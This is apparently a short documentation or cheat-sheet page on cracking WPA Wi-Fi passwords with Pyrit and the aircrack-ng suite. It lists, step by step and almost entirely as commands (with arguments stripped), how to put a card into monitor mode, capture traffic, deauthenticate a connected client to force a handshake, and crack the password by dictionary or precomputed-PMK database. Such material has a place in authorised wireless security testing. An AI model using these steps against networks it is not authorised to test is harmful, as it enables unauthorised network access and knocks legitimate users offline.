pyrit_attack
PYRIT ATTACK
Pyrit Attack
Place your wireless card into monitor mode on the channel number of the AP:
airmon-ng start
Use Pyrit to sniff on the monitor mode interface, saving the capture to a file:
pyrit -r -o stripLive
Deauthenticate a connected client to force it to complete the 4-way handshake:
aireplay-ng -0 1 -a -c
Run Pyrit in dictionary mode to crack the WPA password:
pyrit -r -i -b attack_passthrough
To use Pyrit in database mode, begin by importing your wordlist:
pyrit -i import_passwords
Add the ESSID of the access point to the Pyrit database:
pyrit -e create_essid
Generate the PMKs for the ESSID:
pyrit batch
Launch Pyrit in database mode to crack the WPA password:
pyrit -r -b attack_db
Last updated
Was this helpful?